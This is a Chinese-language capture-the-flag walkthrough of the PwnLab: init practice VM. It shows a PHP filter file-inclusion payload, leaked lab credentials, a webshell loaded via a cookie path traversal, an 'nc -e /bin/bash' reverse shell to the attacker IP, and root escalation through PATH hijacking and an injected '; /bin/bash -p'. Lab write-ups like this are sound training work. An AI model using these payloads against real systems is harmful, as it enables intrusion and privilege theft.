【pwnlab_init靶场渗透】

文章目录

一、基础信息

二、信息收集

三、漏洞利用

四、反弹shell

五、提权


一、基础信息

Kali IP :192.168.20.146

靶机IP:192.168.20.157

二、信息收集

nmap -sS -sV -p- -A 192.168.20.157

开放了80、111、3306、50749等端口

访问一下80端口

提示使用这个服务进行上传和共享图片文件等,点击一下upload需要登录

扫描目录看一下

dirsearch -u http://192.168.20.157 -x 403

访问images目录看到有一张图片,保存到本地看一下有没有信息

http://192.168.20.157/images/pwnlab.png

好像没啥内容,然后看到了文件上传的目录

http://192.168.20.157/upload/

然后有几个php文件,但是访问没有内容显示

三、漏洞利用

通过观察网址有可能是存在文件包含的,利用php伪协议进行查看文件

包含config文件,经过尝试后要去掉php后缀

http://192.168.20.157/?page=php://filter/convert.base64-encode/resource=config

解码得到数据库密码,同时可以尝试包含upload和index文件,解码可得到源码

连接数据库查看账户信息

得到三个用户和密码信息,密码疑似base64加密,可进行解密得到密码

复制代码
kent /JWzXuBJJNy
Mike/SIfdsTEn6I
Kane/iSv5Ym2GRo

尝试登录之前的页面

登录成功,尝试上传文件

上传成功

前面知道上传地址,蚁剑访问一下,连接不成功

分析index.php源代码,它以cookie的值作为路径,这个参数为lang

复制代码
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.

那我们就添加一个cookie:lang=../upload/85bb6e49a1be4be02eefb660f9d8cf68.jpg

连接成功

四、反弹shell

nc -e /bin/bash 192.168.20.146 9090

五、提权

上面获得了三个账户密码,尝试登录一下

复制代码
kent /JWzXuBJJNy
Mike/SIfdsTEn6I
Kane/iSv5Ym2GRo

Mike账户无法登录,Kent登录后没发现特殊内容

登录到kane用户,发现家目录下有个msgmike文件,但是文件拥有者是mike,不是很清楚文件是干什么的,看wp提示说该程序的作者试图在cat不提供完整路径的情况下运行了命令!

提权方法:

在运行Bash程序cat的/tmp目录中创建了一个文件shell,并将其添加到$PATH环境变量的开头,系统先cat在/tmp目录中查找二进制文件,并将执行我们的shell!

在tmp目录下:

复制代码
echo /bin/bash > cat    ---创建一个shell命令的文件:/bin/sh
chmod 777 cat         ---赋权
export PATH=/tmp:$PATH  ---赋予tmp目录环境变量
cd && ./msgmike

cd /home/mike

在mike目录下存在msg2root文件,但是文件拥有者为root

尝试再次执行不完整路径任意命令sh,成功获得root权限!

复制代码
./msg2root
; /bin/bash -p
more /root/flag.txt
相关推荐
YoungLime31 分钟前
DVWA靶场之三:跨站请求伪造(CSRF)
网络·安全·web安全
witkey_ak98962 小时前
网安面试题收集(1)
网络安全
YoungLime6 小时前
DVWA靶场之十二:储存型 XSS(Stored Cross Site Scripting (XSS))
网络·安全·web安全
galaxylove15 小时前
Gartner发布网络弹性指南:将业务影响评估(BIA)嵌入网络弹性策略的核心,重点保护基础设施和关键业务系统
网络·安全·web安全
网安INF21 小时前
【论文阅读】-《SparseFool: a few pixels make a big difference》
论文阅读·人工智能·深度学习·网络安全·黑盒攻击
介一安全21 小时前
【Web安全】转义字符注入?转义也会失效的SQL注入
web安全·网络安全·安全性测试·sql注入
网安INF1 天前
【论文阅读】-《Sparse Adversarial Attack via Perturbation Factorization》
论文阅读·人工智能·计算机视觉·网络安全·黑盒攻击
lingggggaaaa1 天前
小迪安全v2023学习笔记(九十七天)—— 云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行
java·笔记·学习·安全·网络安全·云原生·kubernetes
余防1 天前
代码审计
安全·web安全·网络安全
Whoami!1 天前
4-8〔O҉S҉C҉P҉ ◈ 研记〕❘ WEB应用攻击▸命令注入漏洞
网络安全·信息安全·oscp·命令注入攻击